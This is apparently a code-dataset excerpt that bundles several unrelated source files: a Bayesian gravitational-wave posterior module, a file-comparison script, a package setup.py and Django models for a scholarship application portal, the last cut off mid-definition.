not recognized: ' + d)\n \n location = lal.CachedDetectors[diff].location\n\n timedelay = lal.TimeDelayFromEarthCenter(location, params['ra'], dec, tgps)\n\n timeshift = params['time'] + timedelay\n \n fplus, fcross = lal.ComputeDetAMResponse(lal.CachedDetectors[diff].response,\n params['ra'], dec, params['psi'], gmst)\n\n h = combine_and_timeshift(fplus, fcross, hpdata, hcdata, self.fs, timeshift)\n\n hout.append(h)\n\n return hout\n\n def malmquist_snr(self, params):\n \"\"\"Returns the SNR that will be used in the Malmquist threshold in the\n likelihood function.\n\n The malmquist SNR is either:\n\n * The SNR in the second-loudest detector if there are two or\n more detectors.\n\n * The SNR if there is only one detector.\n\n The intention is to approximate a coincidence threshold from a\n pipeline.\n\n \"\"\"\n\n hs = self.generate_waveform(params)\n df = self.fs[1] - self.fs[0]\n\n adj_psd = self.adjusted_psd(params)\n rhos = [np.sqrt(4.0*df*np.real(np.sum(np.conj(h)*h/psd))) for h, psd in zip(hs, adj_psd)]\n \n if len(rhos) > 1:\n rhos.sort()\n return rhos[-2]\n else:\n return rhos[0]\n\n def log_likelihood(self, params):\n r\"\"\"Returns the log likelihood of the given parameters. The\nlog-likelihood is\n\n .. math::\n \n \\log \\mathcal{L} = -\\frac{1}{2} \\left( \\left\\langle d | d \\right\\rangle -2 \\Re \\left\\langle d | h \\right\\rangle + \\left\\langle h | h \\right\\rangle \\right) - \\frac{1}{2} \\sum \\log S(f)\n\n where \n\n .. 
math::\n\n \\left\\langle a | b \\right\\rangle = 4 \\int df \\, \\frac{a^*(f) b(f)}{S(f)},\n\n where :math:`S(f)` is the one-sided noise power spectral density.\n\n This corresponds to the ususal log-likelihood in Gaussian\n noise, accounting for the fact that parameters can cause the\n PSD to vary.\n\n If the :attr:`Posterior.malmquest_snr` is not ``None``, then\n the likelihood will be returned as ``float('-inf')`` when\n :math:`\\left\\langle h | h \\right\\rangle^{1/2}` is smaller than\n :attr:`Posterior.malmquest_snr`\"\"\"\n\n hs = self.generate_waveform(params)\n df = self.fs[1] - self.fs[0]\n\n istart = np.nonzero(self.fs >= self.fmin)[0][0]\n\n hh_list=[]\n logl = 0.0\n adj_psd = self.adjusted_psd(params)\n for h, d, psd in zip(hs, self.data, adj_psd):\n hh,dh,dd = data_waveform_inner_product(istart, df, psd, h, d)\n\n hh_list.append(hh)\n\n logl += -0.5*(hh - 2.0*dh + dd)\n logl -= np.sum(np.log(2.0*np.pi*psd[istart:]/(4.0*(self.fs[1]-self.fs[0]))))\n\n # If malmquist priors, then cutoff when the SNR is too quiet.\n hh_list.sort()\n if self.msnr is not None:\n if len(hh_list) > 1 and hh_list[1] < self.msnr*self.msnr:\n return float('-inf')\n elif len(hh_list) == 1 and hh_list[0] < self.msnr*self.msnr:\n return float('-inf')\n\n return logl\n\n def log_prior(self, params):\n \"\"\"Returns the log of the prior. More details to follow. \n \"\"\"\n params = self.to_params(params)\n\n if isinstance(params, np.ndarray):\n params = params[0]\n\n if params['eta'] < 0 or params['eta'] > 0.25:\n return float('-inf')\n\n # First basic ranges on parameters:\n mc = np.exp(params['log_mc'])\n d = np.exp(params['log_dist'])\n m1,m2=u.mc_eta_to_masses(mc, params['eta'])\n mtot = m1+m2\n\n if m1 > self.mmax or m2 < self.mmin:\n return float('-inf')\n\n if params['cos_iota'] < -1.0 or params['cos_iota'] > 1.0:\n return float('-inf')\n\n if params['phi'] > 2.0*np.pi or params['phi'] < 0.0:\n return float('-inf')\n\n if params['psi'] > 2.0*np.pi or params['psi'] < 0.0:\n return float('-inf')\n\n if params['time'] < 0 or params['time'] > self.T:\n return float('-inf')\n\n if params['ra'] < 0.0 or params['ra'] > 2.0*np.pi:\n return float('-inf')\n\n if params['sin_dec'] < -1.0 or params['sin_dec'] > 1.0:\n return float('-inf')\n\n if d > self.dmax:\n return float('-inf')\n\n if params['a1'] <= 0.0 or params['a1'] >= 1.0:\n return float('-inf')\n\n if params['a2'] <= 0.0 or params['a2'] >= 1.0:\n return float('-inf')\n\n if params['cos_tilt1'] < -1.0 or params['cos_tilt1'] > 1.0:\n return float('-inf')\n\n if params['cos_tilt2'] < -1.0 or params['cos_tilt2'] > 1.0:\n return float('-inf')\n\n if params['phi1'] < 0.0 or params['phi1'] >= 2.0*np.pi:\n return float('-inf')\n\n if params['phi2'] < 0.0 or params['phi2'] >= 2.0*np.pi:\n return float('-inf')\n\n logp = 0.0\n\n # A flat prior in mass space gives the following in log(mc)-eta space:\n logp -= np.log(m1-m2) - 3.0*np.log(mtot)\n \n # Prior volumetric in distance:\n logp += 3.0*params['log_dist']\n\n # N(0,1) prior on PSD parameters (which are log(factor) at\n # each frequency).\n logp += np.sum(u.norm_logpdf(params['psdfit']))\n\n if isinstance(logp, np.ndarray):\n if logp.ndim > 0:\n logp = logp[0]\n else:\n logp = logp[()]\n\n return logp\n\n def draw_prior(self, shape=(1,)):\n params = self.to_params(np.zeros(shape+(self.nparams,))).squeeze()\n\n m1s = np.random.uniform(low=self.mmin, high=self.mmax, size=shape)\n m2s = np.random.uniform(low=self.mmin, high=self.mmax, size=shape)\n\n mc, eta = u.masses_to_mc_eta(m1s, m2s)\n\n params['log_mc'] = 
np.log(mc)\n params['eta'] = eta\n\n params['cos_iota'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['phi'] = np.random.uniform(low=0.0, high=np.pi, size=shape)\n params['psi'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['time'] = np.random.uniform(low=0.0, high=self.T, size=shape)\n params['ra'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['sin_dec'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['log_dist'] = np.log(self.dmax) + (1.0/3.0)*np.log(np.random.uniform(size=shape))\n params['a1'] = np.random.uniform(low=0.0, high=1.0, size=shape)\n params['a2'] = np.random.uniform(low=0.0, high=1.0, size=shape)\n params['cos_tilt1'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['cos_tilt2'] = np.random.uniform(low=-1.0, high=1.0, size=shape)\n params['phi1'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n params['phi2'] = np.random.uniform(low=0.0, high=2.0*np.pi, size=shape)\n\n params['psdfit'] = np.random.normal(size=shape + (len(self.detectors), self.npsdfit))\n\n return params\n\n def argmax_log_likelihood_tphid(self, params):\n params = self.to_params(params)\n\n df = self.fs[1] - self.fs[0]\n hs = self.generate_waveform(params)\n\n \n dh_dt_cos = 0.0\n dh_dt_sin = 0.0\n hh = 0.0\n adj_psd = self.adjusted_psd(params)\n\n for d, h, psd in zip(self.data, hs, adj_psd):\n conj_d = np.conj(d)\n dh_real = 2.0*df*conj_d*np.real(h)/psd\n dh_imag = 2.0*df*conj_d*np.imag(h)/psd\n\n self.c2r_input_fft_array[:] = dh_real\n self.c2r_fft_plan()\n dh_dt_cos += self.c2r_output_fft_array\n\n self.c2r_input_fft_array[:] = dh_imag\n self.c2r_fft_plan()\n dh_dt_sin += self.c2r_output_fft_array\n\n hh += np.sum(4.0*df*np.abs(h)*np.abs(h)/psd)\n\n\n dh_dt = np.sqrt(dh_dt_cos*dh_dt_cos + dh_dt_sin*dh_dt_sin)\n idt = np.argmax(dh_dt)\n\n if idt == 0:\n a = np.abs(dh_dt[0])\n b = np.abs(dh_dt[1])\n c = np.abs(dh_dt[2])\n i0 = 0\n elif idt == len(dh_dt) - 1:\n a = np.abs(dh_dt[-3])\n b = np.abs(dh_dt[-2])\n c = np.abs(dh_dt[-1])\n i0 = len(dh_dt) - 3\n else:\n a = np.abs(dh_dt[idt-1])\n b = np.abs(dh_dt[idt])\n c = np.abs(dh_dt[idt+1])\n i0 = idt-1\n\n imax = i0 + 0.5 + (a-b)/(a+c-2.0*b)\n\n dt_max = imax/float(self.srate)\n dphi_max = -0.5*np.arctan2(dh_dt_sin[idt], dh_dt_cos[idt])\n\n dh_max = np.abs(dh_dt[idt])\n dfactor = hh / dh_max\n logd_max = params['log_dist'] + np.log(dfactor)\n\n max_params = params.copy()\n\n max_params['log_dist'] = logd_max\n\n max_params['phi'] = np.mod(params['phi'] + dphi_max, np.pi)\n if max_params['phi'] < 0:\n max_params['phi'] += np.pi\n\n max_params['time'] = np.mod(params['time'] + dt_max, self.T)\n\n return max_params\n\n def __call__(self, params):\n lp = self.log_prior(params)\n\n if lp == float('-inf'):\n return lp\n\n return lp + self.log_likelihood(params)\n\nclass TimeMarginalizedPosterior(Posterior):\n \"\"\"Posterior that marginalizes out the time variable on each\n likelihood call.\"\"\"\n\n def __init__(self, *args, **kwargs):\n \"\"\"See :method:`Posterior.__init__`.\"\"\"\n super(TimeMarginalizedPosterior, self).__init__(*args, **kwargs)\n\n def to_params(self, params):\n try:\n return params.view([('log_mc', np.float),\n ('eta', np.float),\n ('cos_iota', np.float),\n ('phi', np.float),\n ('psi', np.float),\n ('ra', np.float),\n ('sin_dec', np.float),\n ('log_dist', np.float), \n ('a1', np.float),\n ('cos_tilt1', np.float),\n ('phi1', np.float),\n ('a2', np.float),\n ('cos_tilt2', np.float),\n ('phi2', np.float)] + \\\n [('psdfit', np.float, (self.ndetectors, 
self.npsdfit))])\n        except:\n            return super(TimeMarginalizedPosterior, self).to_params(params)\n\n    @property\n    def header(self):\n        \"\"\"A useful header describing the parameters for this posterior in text files.\n\n        \"\"\"\n\n        header = ['log_mc', 'eta', 'cos_iota', 'phi', 'psi', 'ra', 'sin_dec', \n                  'log_dist', 'a1', 'cos_tilt1', 'phi1', 'a2', 'cos_tilt2', \n                  'phi2']\n\n        for d in self.detectors:\n            for i in range(self.npsdfit):\n                header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n        return ' '.join(header)\n\n    @property\n    def tm_nparams(self):\n        return 14 + self.ndetectors*self.npsdfit\n\n    def to_super_params(self, params, time=0):\n        params = self.to_params(params)\n        sps = super(TimeMarginalizedPosterior, self).to_params(np.zeros(params.shape + (self.nparams,)))\n\n        for name in params.dtype.names:\n            sps[name] = params[name]\n\n        sps['time'] = time\n\n        return sps\n\n    def from_super_params(self, params):\n        params = self.to_params(params)\n        sps = self.to_params(np.zeros(params.shape+(self.tm_nparams,))).squeeze()\n\n        for name in sps.dtype.names:\n            sps[name] = params[name]\n\n        return sps\n\n    def adjusted_psd(self, params):\n        pfull = self.to_super_params(params)\n        return super(TimeMarginalizedPosterior, self).adjusted_psd(pfull)\n\n    def malmquist_snr(self, params):\n        \"\"\"See :method:`Posterior.malmquist_snr`.\"\"\"\n        p = self.to_super_params(params, time=0)\n\n        return super(TimeMarginalizedPosterior, self).malmquist_snr(p)\n\n    def time_integrate(self, log_ls):\n        \"\"\"Returns the log of the integral of the given log(L) values as a\n        function of time, using the trapezoid rule (for the periodic\n        log(L) series this equals a rectangle-rule sum over one period).\n\n        \"\"\"\n        \n        # Periodic extension of the log(L) series; the sum below operates\n        # on log_ls directly, which is equivalent for a periodic series.\n        full_log_ls = np.zeros(log_ls.shape[0]+1)\n        full_log_ls[:-1] = log_ls\n        full_log_ls[-1] = log_ls[0]\n\n        dt = 1.0/self.srate\n\n        # dt*sum(log_ls) = dt*(1/2*fll[0] + fll[1] + ... 
+ fll[N-1] + 1/2*fll[N])\n # This is the trapezoid rule for the integral.\n log_best_integral = logaddexp_sum(log_ls) + np.log(dt)\n\n return log_best_integral\n\n def log_likelihood(self, params):\n \"\"\"Returns the marginalized log-likelihood at the given params (which\n should have all parameters but time).\"\"\"\n \n params = self.to_params(params)\n params_full = self.to_super_params(params, time=0)\n\n hs = self.generate_waveform(params_full)\n\n ll = 0.0\n df = self.fs[1] - self.fs[0]\n\n hh_list = []\n dh_timeshifts = 0.0\n adj_psd = self.adjusted_psd(params)\n for h, d, psd in zip(hs, self.data, adj_psd):\n hh,dd = hh_dd_sum(df, psd, h, d)\n\n hh_list.append(hh)\n\n fill_fft_array(df, psd, d, h, self.c2r_input_fft_array)\n self.c2r_fft_plan()\n dh_timeshifts += self.c2r_output_fft_array\n \n ll += -0.5*(hh + dd)\n ll -= np.sum(np.log(2.0*np.pi*psd[psd != float('inf')]/(4.0*(self.fs[1]-self.fs[0]))))\n\n dh = self.time_integrate(dh_timeshifts)\n ll += dh\n\n # Normalization for time integral\n ll -= np.log(self.T)\n\n if self.msnr is not None:\n if len(hh_list) == 1:\n hh2nd = hh_list[0]\n else:\n hh_list.sort()\n hh2nd = hh_list[-2]\n\n if hh2nd < self.msnr*self.msnr:\n return float('-inf')\n\n return ll\n\n def log_prior(self, params):\n \"\"\"Log prior; same as :method:`Posterior.log_prior`, but without\n `time` column.\n\n \"\"\"\n \n params = self.to_params(params)\n params_full = self.to_super_params(params, time = 0.5*self.T)\n\n return super(TimeMarginalizedPosterior, self).log_prior(params_full)\n\n def draw_prior(self, shape=(1,)):\n pfull = super(TimeMarginalizedPosterior, self).draw_prior(shape=shape)\n return self.from_super_params(pfull)\n\n def argmax_log_likelihood_phid(self, params):\n params_full = self.to_super_params(params, time = 0.5*self.T)\n \n p = self.from_super_params(super(TimeMarginalizedPosterior, self).argmax_log_likelihood_tphid(params_full))\n\n return p\n\nclass NoiseOnlyPosterior(Posterior):\n \"\"\"Represents the posterior for a noise-only model.\n\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(NoiseOnlyPosterior, self).__init__(*args, **kwargs)\n\n @property\n def header(self):\n header = []\n for d in self.detectors:\n for i in range(self.npsdfit):\n header.append('{0:s}PSD{1:02d}'.format(d,i))\n\n return ' '.join(header)\n\n\n @property\n def no_nparams(self):\n return self.ndetectors*self.npsdfit\n\n def to_params(self, params):\n try:\n return params.view([('psdfit', np.float, (self.ndetectors, self.npsdfit))])\n except:\n return super(NoiseOnlyPosterior, self).to_params(params)\n\n def generate_waveform(self, params):\n if params.view(float).shape[0] == self.no_nparams:\n hs = []\n for d in self.data:\n hs.append(0.0*d)\n return hs\n else:\n return super(NoiseOnlyPosterior, self).generate_waveform(params)\n\n def log_prior(self, params):\n return np.sum(u.norm_logpdf(params))\n\n def draw_prior(self, shape=(1,)):\n return self.to_params(np.random.normal(size=shape+(self.ndetectors*self.npsdfit,)))\n\n \n","repo_name":"farr/nu-ligo-utils","sub_path":"ensemble-sampler/posterior.py","file_name":"posterior.py","file_ext":"py","file_size_in_byte":37170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70724901870","text":"#!/usr/bin/env python\n\nc1 = open(\"Comp1.txt\", \"r\")\nc2 = open(\"Comp2.txt\", \"r\")\narchivoUno = c1.readlines()\narchivoDos = c2.readlines()\nc1.close()\nc2.close()\nresult = open(\"resultado.txt\", \"w\")\n\nx = 0\nfor i in archivoUno:\n if i != 
archivoDos[x]:\n result.write(i+\"El otro archivo contiene >> \"+archivoDos[x])\n x += 1\n\n\t\nresult.close()","repo_name":"jetsky0/projectvoteredes","sub_path":"huellas_ordinario.py","file_name":"huellas_ordinario.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23708278234","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as f:\n readme = f.read()\n\nwith open('LICENSE.md') as f:\n license = f.read()\n\nrequirements = [\n 'numpy',\n 'matplotlib',\n 'pretty_midi',\n 'pyFluidSynth >= 1.2.5',\n 'librosa',\n 'essentia',\n 'keras',\n 'tensorflow',\n]\n\nsetup(\n name='mai',\n version='0.0.1',\n description='Music and Artificial Intelligence',\n long_description=readme,\n author='David Kant',\n author_email='dkant@ucsc.edu',\n url='https://canvas.ucsc.edu/courses/12767',\n license=license,\n packages=find_packages(exclude=('tests', 'docs')),\n install_requires=requirements\n)\n","repo_name":"davidkant/mai","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"38"} +{"seq_id":"71450660271","text":"from uuid import uuid4\n\nimport pdfkit\nfrom django.conf import settings\nfrom django.contrib.staticfiles import finders\nfrom django.core.validators import (\n MaxValueValidator,\n MinValueValidator,\n FileExtensionValidator,\n)\nfrom django.db import models\nfrom django.template.loader import render_to_string\n\nfrom accounts.models import UserAccount, Student, Session\n\nSTATE_CHOICES = (\n (\"Andhra Pradesh\", \"Andhra Pradesh\"),\n (\"Arunachal Pradesh\", \"Arunachal Pradesh\"),\n (\"Assam\", \"Assam\"),\n (\"Bihar\", \"Bihar\"),\n (\"Chhattisgarh\", \"Chhattisgarh\"),\n (\"Goa\", \"Goa\"),\n (\"Gujarat\", \"Gujarat\"),\n (\"Haryana\", \"Haryana\"),\n (\"Himachal Pradesh\", \"Himachal Pradesh\"),\n (\"Jharkhand\", \"Jharkhand\"),\n (\"Karnataka\", \"Karnataka\"),\n (\"Kerala\", \"Kerala\"),\n (\"Madhya Pradesh\", \"Madhya Pradesh\"),\n (\"Maharashtra\", \"Maharashtra\"),\n (\"Manipur\", \"Manipur\"),\n (\"Meghalaya\", \"Meghalaya\"),\n (\"Mizoram\", \"Mizoram\"),\n (\"Nagaland\", \"Nagaland\"),\n (\"Odisha\", \"Odisha\"),\n (\"Punjab\", \"Punjab\"),\n (\"Rajasthan\", \"Rajasthan\"),\n (\"Sikkim\", \"Sikkim\"),\n (\"Tamil Nadu\", \"Tamil Nadu\"),\n (\"Telangana\", \"Telangana\"),\n (\"Tripura\", \"Tripura\"),\n (\"Uttarakhand\", \"Uttarakhand\"),\n (\"Uttar Pradesh\", \"Uttar Pradesh\"),\n (\"West Bengal\", \"West Bengal\"),\n (\"Andaman and Nicobar Islands\", \"Andaman and Nicobar Islands\"),\n (\"Chandigarh\", \"Chandigarh\"),\n (\n \"Dadra and Nagar Haveli and Daman & Diu\",\n \"Dadra and Nagar Haveli and Daman & Diu\",\n ),\n (\"The Government of NCT of Delhi\", \"The Government of NCT of Delhi\"),\n (\"Jammu & Kashmir\", \"Jammu & Kashmir\"),\n (\"Ladakh\", \"Ladakh\"),\n (\"Lakshadweep\", \"Lakshadweep\"),\n (\"Puducherry\", \"Puducherry\"),\n)\n\n\nclass Constraint(models.Model):\n name = models.CharField(max_length=1024)\n description = models.TextField(blank=True, null=True)\n required = models.BooleanField(default=True)\n\n def __str__(self):\n return self.name\n\n\nclass ScholarshipCategory(models.Model):\n name = models.CharField(max_length=1024)\n\n def __str__(self):\n return self.name\n\n class Meta:\n verbose_name_plural = \"Scholarship Categories\"\n\n\nclass Scholarship(models.Model):\n class 
ScholarshipType(models.IntegerChoices):\n # NOTE: don't change the integer values\n MCM_TIET = 1\n MCM_ALUMNI = 2\n MCM_OTHER = 3\n MERIT_ALUMNI = 4\n MERIT_AUTO = 5\n\n name = models.CharField(max_length=200)\n category = models.ForeignKey(ScholarshipCategory, on_delete=models.CASCADE)\n scholarship_type = models.IntegerField(choices=ScholarshipType.choices)\n\n eligibility_criteria = models.TextField()\n number_of_scholarships = models.CharField(max_length=1024)\n value_of_scholarship = models.TextField()\n\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n constraints = models.ManyToManyField(Constraint, through=\"ScholarshipConstraint\")\n\n def __str__(self):\n return self.name\n\n @property\n def verbose_type(self):\n if self.scholarship_type == 1:\n return \"MCM_TIET\"\n elif self.scholarship_type == 2:\n return \"MCM_ALUMNI\"\n elif self.scholarship_type == 3:\n return \"MCM_OTHER\"\n elif self.scholarship_type == 4:\n return \"MERIT_ALUMNI\"\n else:\n return \"MERIT_AUTO\"\n\n\nclass ScholarshipConstraint(models.Model):\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n constraint = models.ForeignKey(Constraint, on_delete=models.CASCADE)\n min_value = models.FloatField(blank=True, null=True)\n max_value = models.FloatField(blank=True, null=True)\n\n def __str__(self):\n return f\"{self.constraint.name} constraint on [{self.scholarship.name}]\"\n\n\nclass MCMTietApplication(models.Model):\n \"\"\"Scholarship Type: MCM_TIET = 1\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n contact_number = models.PositiveIntegerField()\n alternate_contact_number = models.PositiveIntegerField()\n state_of_residence = models.CharField(choices=STATE_CHOICES, max_length=255)\n\n class_12_marks = models.CharField(\n max_length=255, help_text=\"Enter percentage e.g. 
89.8 \"\n ) # % or CGPA\n current_cgpa_or_rank = models.CharField(\n max_length=255, help_text=\"Current CGPA or Rank or Diploma %\"\n )\n\n family_income_per_mcm_application = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS MENTIONED IN MCM APPLICATION FORM\"\n )\n family_income_per_affidavit = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS PER AFFIDAVIT ATTACHED\"\n )\n family_income_per_certificate = models.CharField(\n max_length=255, help_text=\"FAMILY INCOME AS PER CERTIFICATE OF TEHSILDAR\"\n )\n bank_balance = models.IntegerField()\n fdr_balance = models.CharField(max_length=255, help_text=\"\")\n\n itr_annual_year_current = models.IntegerField(help_text=\"ITR for this annual year\")\n itr_annual_year_last = models.IntegerField(help_text=\"ITR for previous annual year\")\n itr_annual_year_last_last = models.IntegerField(\n help_text=\"ITR for last to last annual year\"\n )\n\n immovable_property = models.BooleanField(\n help_text=\"IMMOVABLE PROPERTY AS PER AFFIDAVIT\"\n )\n single_girl_child = models.BooleanField(help_text=\"Are you a Single Girl Child?\")\n\n applied_for_mcp_special = models.BooleanField(help_text=\"APPLIED FOR MCM SPECIAL?\")\n mcp_special_reason = models.TextField(\n help_text=\"SPECIFIC REASON FOR APPLYING MCM SPECIAL?\", blank=True, null=True\n )\n\n applied_for_other_scholarship = models.BooleanField(\n help_text=\"HAVE YOU APPLIED FOR ANY OTHER SCHOLARSHIP?\"\n )\n other_scholarship_details = models.TextField(\n help_text=\"DETAILS OF OTHER SCHOLARSHIP APPLIED\", blank=True, null=True\n )\n\n previous_year_scholarship = models.BooleanField(\n help_text=\"HAVE YOU RECEIVED ANY SCHOLARSHIP IN THE PREVIOUS YEAR?\"\n )\n previous_year_scholarship_details = models.TextField(\n help_text=\"DETAILS OF PREVIOUS SCHOLARSHIP RECEIVED\", blank=True, null=True\n )\n previous_year_scholarship_amount = models.IntegerField(\n help_text=\"AMOUNT OF THE PREVIOUS SCHOLARSHIP\", blank=True, null=True\n )\n\n income_certificate = models.FileField(\n help_text=\"Please upload a digital / scanned copy of your income certificate\",\n upload_to=\"income_certificates\",\n validators=[\n FileExtensionValidator(allowed_extensions=[\"pdf\", \"jpg\", \"png\", \"jpeg\"])\n ],\n )\n supporting_documents = models.FileField(\n help_text=\"Please upload supporting documents in a .zip format, if any\",\n blank=True,\n null=True,\n upload_to=\"supporting_documents\",\n )\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that i have read all the eligibility criteria of scholarship and i am eligible for \"\n \"applying to TIET Merit-cum-means scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n # TODO: fill more fields, https://docs.google.com/forms/d/e/1FAIpQLScSaU3NGIu13V4j9fEi5B1Djl503c72o9sZ-9YsVY1_hsM4aA/viewform\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Applications\"\n verbose_name = \"Merit cum means Application\"\n\n\nclass MCMAlumniApplication(models.Model):\n \"\"\"Scholarship Type: MCM_ALUMNI = 2\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n\n photograph = models.FileField(\n help_text=\"Passport size photograph in JPG/PNG 
under 2 MB.\",\n blank=True,\n null=True,\n upload_to=\"photographs\",\n )\n\n roll_no = models.CharField(max_length=20, help_text=\"Registration/Roll No\")\n personal_contact_number = models.PositiveIntegerField()\n year = models.CharField(max_length=20, help_text=\"Year\")\n branch = models.CharField(max_length=20, help_text=\"Branch\")\n\n jee_main_rank = models.CharField(max_length=255, help_text=\"JEE Main Rank\")\n current_cgpa = models.CharField(max_length=255, help_text=\"Current CGPA\")\n\n father_name = models.CharField(max_length=255, help_text=\"Father's Name\")\n father_profession = models.CharField(\n max_length=255, help_text=\"Father's Profession\"\n )\n father_contact_number = models.PositiveIntegerField(\n help_text=\"Father's Contact Number\"\n )\n\n mother_name = models.CharField(max_length=255, help_text=\"Mother's Name\")\n mother_profession = models.CharField(\n max_length=255, help_text=\"Mother's Profession\"\n )\n\n mother_contact_number = models.PositiveIntegerField(\n help_text=\"Mother's Contact Number\"\n )\n\n family_income_per_annum = models.CharField(\n max_length=255, help_text=\"Family income per annum\"\n )\n\n bank_name = models.CharField(max_length=255, help_text=\"Student's Bank Name\")\n bank_account_number = models.CharField(\n max_length=255, help_text=\"Bank Savings Account Number\"\n )\n banK_address = models.CharField(max_length=255, help_text=\"Bank Branch Address\")\n bank_ifsc_code = models.CharField(max_length=255, help_text=\"Bank IFSC Code\")\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that I have read all the eligibility criteria of this scholarship and I am eligible \"\n \"for applying to this scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Alumni Applications\"\n verbose_name = \"Merit cum Means Alumni Application\"\n\n\nclass MCMOtherApplication(models.Model):\n \"\"\"Scholarship Type: MCM_OTHER = 3\"\"\"\n\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n\n photograph = models.FileField(\n help_text=\"Passport size photograph in JPG/PNG under 2 MB.\",\n blank=True,\n null=True,\n upload_to=\"photographs\",\n )\n\n roll_no = models.CharField(max_length=20, help_text=\"Registration/Roll No\")\n personal_contact_number = models.PositiveIntegerField()\n year = models.CharField(max_length=20, help_text=\"Year\")\n branch = models.CharField(max_length=20, help_text=\"Branch\")\n\n jee_main_rank = models.CharField(max_length=255, help_text=\"JEE Main Rank\")\n current_cgpa = models.CharField(max_length=255, help_text=\"Current CGPA\")\n\n father_name = models.CharField(max_length=255, help_text=\"Father's Name\")\n father_profession = models.CharField(\n max_length=255, help_text=\"Father's Profession\"\n )\n father_contact_number = models.PositiveIntegerField(\n help_text=\"Father's Contact Number\"\n )\n\n mother_name = models.CharField(max_length=255, help_text=\"Mother's Name\")\n mother_profession = models.CharField(\n max_length=255, help_text=\"Mother's Profession\"\n )\n\n mother_contact_number = models.PositiveIntegerField(\n help_text=\"Mother's Contact Number\"\n )\n\n 
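# NOTE: this field block repeats MCMAlumniApplication verbatim. A hedged refactoring sketch -- assuming no migrations depend on the current layout, and using a hypothetical BaseMCMApplication name -- would hoist the shared fields into an abstract base model:\n    #\n    #   class BaseMCMApplication(models.Model):\n    #       student = models.ForeignKey(Student, on_delete=models.CASCADE)\n    #       scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n    #       # ...shared contact, CGPA, bank and status fields...\n    #\n    #       class Meta:\n    #           abstract = True\n    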
family_income_per_annum = models.CharField(\n max_length=255, help_text=\"Family income per annum\"\n )\n\n bank_name = models.CharField(max_length=255, help_text=\"Student's Bank Name\")\n bank_account_number = models.CharField(\n max_length=255, help_text=\"Bank Savings Account Number\"\n )\n banK_address = models.CharField(max_length=255, help_text=\"Bank Branch Address\")\n bank_ifsc_code = models.CharField(max_length=255, help_text=\"Bank IFSC Code\")\n\n declaration = models.BooleanField(\n help_text=\"I acknowledge that I have read all the eligibility criteria of this scholarship and I am eligible \"\n \"for applying to this scholarship.\"\n )\n\n status = models.CharField(\n max_length=1024,\n default=\"PENDING\",\n choices=(\n (\"PENDING\", \"PENDING\"),\n (\"APPROVED\", \"APPROVED\"),\n (\"REJECTED\", \"REJECTED\"),\n ),\n )\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return f\"Application for [{self.scholarship.name[:15]}...]\"\n\n class Meta:\n verbose_name_plural = \"Merit cum Means Other Applications\"\n verbose_name = \"Merit cum Means Other Application\"\n\n\nclass NoticeCategory(models.Model):\n id = models.UUIDField(default=uuid4, primary_key=True, unique=True, editable=False)\n title = models.TextField()\n collapsed = models.BooleanField(default=True)\n\n def __str__(self):\n return self.title\n\n class Meta:\n verbose_name_plural = \"Notice Categories\"\n\n\nclass Notice(models.Model):\n id = models.UUIDField(default=uuid4, primary_key=True, unique=True, editable=False)\n category = models.ForeignKey(\n NoticeCategory, on_delete=models.CASCADE, blank=True, null=True\n )\n title = models.TextField()\n attachment = models.FileField(blank=True, null=True, upload_to=\"notice_attachments\")\n link = models.CharField(max_length=1024, blank=True, null=True)\n date = models.DateTimeField(auto_now_add=True, editable=False)\n\n def __str__(self):\n return self.title\n\n\nclass Grievance(models.Model):\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n subject = models.TextField()\n issue_details = models.TextField()\n date_opened = models.DateTimeField(auto_now_add=True)\n\n resolved = models.BooleanField(default=False)\n remarks = models.TextField(blank=True, null=True)\n\n def __str__(self):\n return self.subject\n\n\nclass ReceivedScholarship(models.Model):\n student = models.ForeignKey(Student, on_delete=models.CASCADE)\n scholarship = models.ForeignKey(Scholarship, on_delete=models.CASCADE)\n session = models.ForeignKey(Session, on_delete=models.CASCADE)\n\n year_of_study = models.CharField(max_length=1024, blank=True, 